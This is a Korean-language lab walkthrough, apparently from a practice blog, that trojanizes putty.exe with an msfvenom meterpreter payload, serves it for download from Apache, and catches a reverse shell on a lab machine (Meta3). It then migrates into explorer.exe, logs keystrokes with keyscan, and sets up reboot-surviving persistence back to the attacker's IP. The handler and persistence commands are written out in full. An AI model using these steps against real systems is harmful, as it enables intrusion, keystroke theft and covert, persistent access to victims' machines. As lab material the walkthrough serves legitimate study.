msfvenom을 이용한 권한 상승 및 keyscan

권한 상승 및 keyscan

keyscan : 공격 대상이 입력한 키 값이 커널로 가기 전 낚아챈다.

공격 대상이 자주 쓸만한, 혹은 클릭해볼만한 실행 파일을 준비한다.

이름도 생소한 파일일 경우 클릭하지 않을 확률이 높기 때문에 자주 쓰는 파일에 악성코드를 끼워넣는 방식이 더 많이 쓰인다.

msfvenom을 이용하여 putty.exe 파일에 악성코드를 주입하여 putty1.exe 파일을 생성한다.

이름을 같게 하는 것이 좋겠지만, 실습 편의상 구분을 위해 다르게 설정하였다.

기존의 파일에 악성코드를 주입할 땐 -x 옵션으로 파일을 지정해준다.

putty1.exe 파일이 잘 생성되었다.

apache2 웹서버 실행.

기본 페이지가 잘 뜨는 것을 확인한 후,

1.0.0.51/download/ 를 보면 아직 아무것도 저장되어있지 않다.

위에서 생성한 putty1.exe 파일을 /var/www/html/download/ 로 복사하여

외부에서 접근이 쉽도록 한다.

1.0.0.51/download/ 다시 보면 putty1.exe 파일이 들어가있다.

Meta3에서 같은 경로로 들어가면 putty1.exe 파일 다운로드가 가능하다.

방화벽에 막히지 않도록 reverse_tcp 방식을 사용할 것이다.

# use multi/handler (or exploit/multi/handler)

# set payload windows/x64/meterpreter/reverse_tcp

# set lhost [공격자 IP]

# set lport [msfvenom에서 지정한 port]

Meta3에서 putty1.exe 파일을 다운로드했다면 meterpreter로 접속이 가능하다.

sysinternalsSuite > procexp64.exe 을 실행시켜보면 우리가 쓰는 대부분의 프로그램들이 보통 explorer.exe

밑에서 실행되는 것을 볼 수 있다.

따라서 explorer 권한을 가지면 대부분의 권한을 가지는 것이라 할 수 있다.

접속된 meterpreter에서 ps 명령어를 치면 explorer.exe의 PID를 확인할 수 있다.

getpid는 현재 내가 위치한 PID 확인 명령어이다.

migrate를 이용하여 2176(explorer.exe PID)로 권한 상승 시도.

성공적으로 권한 상승 되었다.

# keyscan_start

Meta3(공격대상)에서 메모장과 같은 키보드 입력 가능한 프로그램을 열어 입력해본다.

다시 meterpreter로 돌아와 keyscan_dump 명령어로

Meta3가 입력한 값들을 그대로 확인 가능하다.

이렇게 키보드 입력 값은 해킹당할 위험이 있기 때문에 요즘엔 중요한 정보들은 마우스로 입력받는 방식이 이용된다.

연결유지

run persistence -A -U -i 20 -r [공격자 IP] -p 11000

> -r : endpoint

공격 대상이 뭔가 낌새가 이상해서 재부팅을 한다 해도 연결이 그대로 남아있게 된다.

사용자가 다시 로그인을 하면 공격자의 kali로 저절로 연결된다.